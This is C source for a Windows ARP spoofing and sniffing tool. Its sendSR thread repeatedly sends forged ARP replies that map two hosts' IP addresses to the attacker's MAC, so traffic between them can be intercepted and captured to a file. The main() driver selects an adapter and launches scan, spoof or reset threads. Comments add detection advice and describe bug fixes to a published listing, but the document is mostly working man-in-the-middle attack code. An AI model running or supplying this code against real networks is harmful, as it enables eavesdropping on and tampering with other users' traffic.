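/*
 * sendSR - thread entry point that transmits ARP replies between the two
 * hosts identified by the globals firstip and secondip.
 *
 * no points to an int selecting the mode:
 *   3  spoof: each host is repeatedly sent a reply that pairs the other
 *      host's IP with this machine's MAC (mmac). The loop only ends when a
 *      send fails.
 *   4  reset: each host is sent one reply that pairs the other host's IP
 *      with the MAC recorded for it (smac / fmac).
 * Any other value, or a NULL pointer, returns at once.
 *
 * Reads the globals firstip, secondip, myip, mm, fm, sm, mmac, fmac, smac,
 * lpadapter and lppackets. They are declared outside this listing; mm, fm
 * and sm appear to be "MAC known" flags for this host, the first host and
 * the second host (confirm against their declarations). Nothing here
 * synchronises access to them with the other threads.
 *
 * Returns 0 on success, (DWORD)-1 on a failed precondition or send.
 *
 * Defensive note: in mode 3 each host receives an unsolicited ARP reply
 * about every two seconds whose sender IP is its peer and whose sender MAC
 * is this machine's. Dynamic ARP Inspection on the switch, static ARP
 * entries for critical hosts, or an ARP monitor that alerts on IP-to-MAC
 * changes are the usual controls for that pattern.
 */
DWORD WINAPI sendSR(LPVOID no)
{
    int fun;
    int k;
    char sendbuf[1024];
    struct sockaddr_in fsin, ssin;
    BOOL stimes;
    ETHDR eth;
    ARPHDR arp;

    if (no == NULL)
        return (DWORD)-1;
    fun = *(int *)no;
    if (fun != 3 && fun != 4)
        return (DWORD)-1;

    /* Only sin_addr is filled in; these are used for inet_ntoa() output. */
    fsin.sin_addr.s_addr = htonl(firstip);
    ssin.sin_addr.s_addr = htonl(secondip);

    /* Header fields that are the same for every frame sent below. */
    eth.eh_type = htons(ETH_ARP);
    arp.arp_hdr = htons(ARP_HARDWARE);
    arp.arp_pro = htons(ETH_IP);
    arp.arp_hln = 6;
    arp.arp_pln = 4;
    arp.arp_opt = htons(ARP_REPLY);

    /* Both modes share the same precondition on the MAC flags. */
    if (!mm) {
        printf("\nNot get enough data\n");
        return (DWORD)-1;
    }
    if ((firstip == myip) && (secondip == myip)) {
        /* Both addresses are this host: use the local MAC for both sides. */
        fm = TRUE;
        sm = TRUE;
        memcpy(fmac, mmac, 6);
        memcpy(smac, mmac, 6);
    } else if (!fm || !sm) {
        printf("\nNot get enough data\n");
        return (DWORD)-1;
    }

    /*
     * inet_ntoa() returns a pointer to a shared static buffer, so each
     * address is printed by its own printf call.
     */
    if (fun == 3) {
        printf("\nSpoofing %.16s : ", inet_ntoa(fsin.sin_addr));
        printf("%.16s ==> ", inet_ntoa(ssin.sin_addr));
        for (k = 0; k < 5; k++)
            printf("%.2x-", mmac[k]);
        printf("%.2x\n", mmac[5]);

        printf("Spoofing %.16s : ", inet_ntoa(ssin.sin_addr));
        printf("%.16s ==> ", inet_ntoa(fsin.sin_addr));
        for (k = 0; k < 5; k++)
            printf("%.2x-", mmac[k]);
        printf("%.2x\n", mmac[5]);

        printf("\ni will try to snoof ...\n\n");
        stimes = TRUE;      /* keep sending until a send fails */
    } else {
        printf("\nReset %.16s : ", inet_ntoa(fsin.sin_addr));
        printf("%.16s ==> ", inet_ntoa(ssin.sin_addr));
        for (k = 0; k < 5; k++)
            printf("%.2x-", smac[k]);
        printf("%.2x\n", smac[5]);

        printf("Reset %.16s : ", inet_ntoa(ssin.sin_addr));
        printf("%.16s ==> ", inet_ntoa(fsin.sin_addr));
        for (k = 0; k < 5; k++)
            printf("%.2x-", fmac[k]);
        printf("%.2x\n\n", fmac[5]);

        stimes = FALSE;     /* one pass only */
    }

    do {
        /* Reply addressed to the first host, describing the second host's IP. */
        memcpy(eth.eh_dst, fmac, 6);
        memcpy(arp.arp_tha, fmac, 6);
        arp.arp_tpa = htonl(firstip);
        arp.arp_spa = htonl(secondip);
        if (!stimes) {
            memcpy(eth.eh_src, smac, 6);
            memcpy(arp.arp_sha, smac, 6);
        } else {
            memcpy(eth.eh_src, mmac, 6);
            memcpy(arp.arp_sha, mmac, 6);
        }
        memset(sendbuf, 0, sizeof(sendbuf));
        /* The page rendering had turned "&eth" into a stray character here. */
        memcpy(sendbuf, &eth, sizeof(eth));
        memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
        PacketInitPacket(lppackets, sendbuf, sizeof(eth) + sizeof(arp));
        /* Asks the driver to write each packet twice; failure only warns. */
        if (PacketSetNumWrites(lpadapter, 2) == FALSE) {
            printf("Warning: Unable to send a packet 2 times\n");
        }
        if (PacketSendPacket(lpadapter, lppackets, TRUE) == FALSE) {
            /* GetLastError() returns a DWORD, so print it as unsigned long. */
            printf("PacketSendPacket in SendSR Error: %lu\n",
                   (unsigned long)GetLastError());
            return (DWORD)-1;
        }
        Sleep(1000);

        /* Reply addressed to the second host, describing the first host's IP. */
        memcpy(eth.eh_dst, smac, 6);
        memcpy(arp.arp_tha, smac, 6);
        arp.arp_tpa = htonl(secondip);
        arp.arp_spa = htonl(firstip);
        if (!stimes) {
            memcpy(eth.eh_src, fmac, 6);
            memcpy(arp.arp_sha, fmac, 6);
        } else {
            memcpy(eth.eh_src, mmac, 6);
            memcpy(arp.arp_sha, mmac, 6);
        }
        memset(sendbuf, 0, sizeof(sendbuf));
        memcpy(sendbuf, &eth, sizeof(eth));
        memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
        PacketInitPacket(lppackets, sendbuf, sizeof(eth) + sizeof(arp));
        if (PacketSendPacket(lpadapter, lppackets, TRUE) == FALSE) {
            printf("PacketSendPacket int sendSR Error: %lu\n",
                   (unsigned long)GetLastError());
            return (DWORD)-1;
        }
        Sleep(1000);
    } while (stimes);

    if (fun == 4)
        printf("Reset Successfully");
    return 0;
}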
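/*
 * main - command-line driver: <mode> <ip1> <ip2>.
 *
 * Mode flags as parsed below:
 *   -m -> 1, -a -> 2 : one sendMASR thread is started per address in the
 *                      range ip1..ip2.
 *   -s -> 3          : capture.txt is opened, then sendMASR and sendSR run.
 *   -r -> 4          : sendMASR and sendSR run (sendSR in its reset mode).
 *
 * The function lists the installed adapters, lets the user pick one, prints
 * the adapter's address information, starts the sniff thread, and then the
 * sender thread(s) for the chosen mode. Returns 0 on success, -1 on error.
 *
 * Robustness fixes relative to the published listing:
 *   - system("cls.exe") named a program that is looked up on the search
 *     path (current directory included); the shell built-in "cls" is used.
 *   - the fopen error printf had a %d with no argument; perror is used.
 *   - the banner fwrite read 20 bytes from a 19-byte literal.
 *   - unparsable addresses (INADDR_NONE) are rejected up front.
 *   - the adapter-name scan no longer reads the element before the buffer
 *     and is bounded by the buffer size.
 *   - scanf's result is checked, so non-numeric input or EOF cannot spin
 *     the selection loop on an uninitialised value.
 *   - lppackets is no longer freed before it has been allocated, and the
 *     adapter is closed when that allocation fails.
 *   - thread handles are checked before use and no longer leaked.
 */
int main(int argc, char *argv[])
{
    HANDLE sthread = NULL, rthread;
    WCHAR adaptername[8192] = {0};
    WCHAR *name1, *name2, *nameend;
    ULONG adapterlength;
    DWORD threadsid, threadrid;
    struct NetType ntype;
    struct bpf_stat stat;
    struct sockaddr_in sin;
    struct npf_if_addr ipbuff;
    int adapternum = 0, opti = 0, open = 0, i, total, got, ch;
    long npflen;
    unsigned long addr1, addr2;

    /* "cls" is a cmd built-in, so no executable is searched for on disk. */
    system("cls");
    start();

    if (argc != 4) {
        usage();
        getche();
        return -1;
    }
    if (!strcmp(argv[1], "-m")) {
        opti = 1;
    } else if (!strcmp(argv[1], "-a")) {
        opti = 2;
    } else if (!strcmp(argv[1], "-s")) {
        opti = 3;
    } else if (!strcmp(argv[1], "-r")) {
        opti = 4;
    } else {
        usage();
        getche();
        return -1;
    }

    /* inet_addr() reports a malformed dotted quad as INADDR_NONE. */
    addr1 = inet_addr(argv[2]);
    addr2 = inet_addr(argv[3]);
    if (addr1 == INADDR_NONE || addr2 == INADDR_NONE) {
        usage();
        getche();
        return -1;
    }
    firstip = ntohl(addr1);
    secondip = ntohl(addr2);
    total = secondip - firstip + 1;

    if (opti == 3) {
        if ((fp = fopen("capture.txt", "w+")) == NULL) {
            perror("Open capture.txt Error");
            return -1;
        }
        /* Write exactly the banner text, not a fixed byte count. */
        fputs("T-ARP Captrue Data", fp);
    }

    printf("\nLibarary Version: %s", PacketGetVersion());

    adapterlength = sizeof(adaptername);
    if (PacketGetAdapterNames((char *)adaptername, &adapterlength) == FALSE) {
        printf("PacketGetAdapterNames Error: %lu\n",
               (unsigned long)GetLastError());
        return -1;
    }

    /*
     * The buffer is treated as a run of NUL-terminated wide strings ended by
     * an empty string. Each name is copied without its terminator, as in the
     * original listing.
     * NOTE(review): adapterlist is declared outside this listing, so neither
     * the number of entries nor the size of one entry is checked here;
     * confirm both against its declaration and add the bounds check there.
     */
    nameend = adaptername + sizeof(adaptername) / sizeof(adaptername[0]);
    name2 = adaptername;
    i = 0;
    for (name1 = adaptername; name1 < nameend; name1++) {
        if (*name1 != L'\0')
            continue;
        if (name1 == name2)
            break;                      /* empty string: end of the list */
        memcpy(adapterlist[i], name2, sizeof(WCHAR) * (size_t)(name1 - name2));
        name2 = name1 + 1;
        i++;
    }
    adapternum = i;

    printf("\nAdapters Installed:\n");
    for (i = 0; i < adapternum; i++)
        wprintf(L"%d - %s\n", i + 1, adapterlist[i]);

    if (adapternum == 0) {
        printf("No adapters found\n");
        return -1;
    }

    for (;;) {
        printf("\nSelect the number of the adapter to open: ");
        got = scanf("%d", &open);
        if (got == 1 && open >= 1 && open <= adapternum)
            break;
        if (got == EOF) {
            printf("\nNot get enough data\n");
            return -1;
        }
        if (got == 0) {
            /* Discard the unparsable line so the next scanf can progress. */
            do {
                ch = getchar();
            } while (ch != '\n' && ch != EOF);
        }
    }

    lpadapter = PacketOpenAdapter(adapterlist[open - 1]);
    if (!lpadapter || (lpadapter->hFile == INVALID_HANDLE_VALUE)) {
        printf("PacketOpenAdapter Error: %lu\n",
               (unsigned long)GetLastError());
        return -1;
    }

    if (PacketGetNetType(lpadapter, &ntype)) {
        printf("\n\t\t*** Host Information ***\n");
        printf("[LinkTpye:]\t%d\t\t", ntype.LinkType);
        printf("[LinkSpeed:]\t%d b/s\n", ntype.LinkSpeed);
    }

    npflen = sizeof(ipbuff);
    if (PacketGetNetInfoEx(adapterlist[open - 1], &ipbuff, &npflen)) {
        /* inet_ntoa() reuses one static buffer: one address per printf. */
        sin = *(struct sockaddr_in *)&(ipbuff.Broadcast);
        printf("[Broadcast:]\t%.16s\t", inet_ntoa(sin.sin_addr));
        sin = *(struct sockaddr_in *)&(ipbuff.SubnetMask);
        printf("[SubnetMask:]\t%.16s\n", inet_ntoa(sin.sin_addr));
        sin = *(struct sockaddr_in *)&(ipbuff.IPAddress);
        printf("[IPAddress:]\t%.16s\t", inet_ntoa(sin.sin_addr));
        myip = ntohl(sin.sin_addr.s_addr);
        printf("[MACAddress:]");
    } else {
        printf("\nNot get enough data\n");
        /* lppackets has not been allocated yet, so only the adapter is released. */
        PacketCloseAdapter(lpadapter);
        return -1;
    }

    if ((lppackets = PacketAllocatePacket()) == NULL) {
        printf("PacketAllocatePacket send Error: %lu\n",
               (unsigned long)GetLastError());
        PacketCloseAdapter(lpadapter);
        return -1;
    }

    rthread = CreateThread(NULL, 0, sniff, (LPVOID)&opti, 0, &threadrid);
    if (rthread == NULL) {
        printf("CreateThread Error: %lu\n", (unsigned long)GetLastError());
        PacketFreePacket(lppackets);
        PacketCloseAdapter(lpadapter);
        return -1;
    }
    Sleep(300);     /* fixed delay; the listing has no other start-up handshake */

    if (getmine()) {
        PacketFreePacket(lppackets);
        PacketFreePacket(lppacketr);
        PacketCloseAdapter(lpadapter);
        return -1;
    }
    Sleep(300);

    if ((opti == 1) || (opti == 2)) {
        for (i = 0; i < total; i++) {
            /* Only the most recent handle is waited on; release the others. */
            if (sthread != NULL)
                CloseHandle(sthread);
            sthread = CreateThread(NULL, 0, sendMASR, (LPVOID)&opti, 0, &threadsid);
            Sleep(30);
        }
        Sleep(1000);
    } else if ((opti == 3) || (opti == 4)) {
        sthread = CreateThread(NULL, 0, sendMASR, (LPVOID)&opti, 0, &threadsid);
        Sleep(300);
        if (sthread != NULL)
            CloseHandle(sthread);
        sthread = CreateThread(NULL, 0, sendSR, (LPVOID)&opti, 0, &threadsid);
    }

    /* sthread stays NULL when the range was empty or thread creation failed. */
    if (sthread != NULL) {
        WaitForSingleObject(sthread, INFINITE);
        CloseHandle(sthread);
    }
    CloseHandle(rthread);

    if (PacketGetStats(lpadapter, &stat) == FALSE) {
        printf("Warning: Unable to get the adapter stat\n");
    } else {
        printf("\n\n%d packets received, %d packets lost !\n", stat.bs_recv, stat.bs_drop);
    }

    PacketFreePacket(lppackets);
    PacketFreePacket(lppacketr);
    PacketCloseAdapter(lpadapter);
    return 0;
}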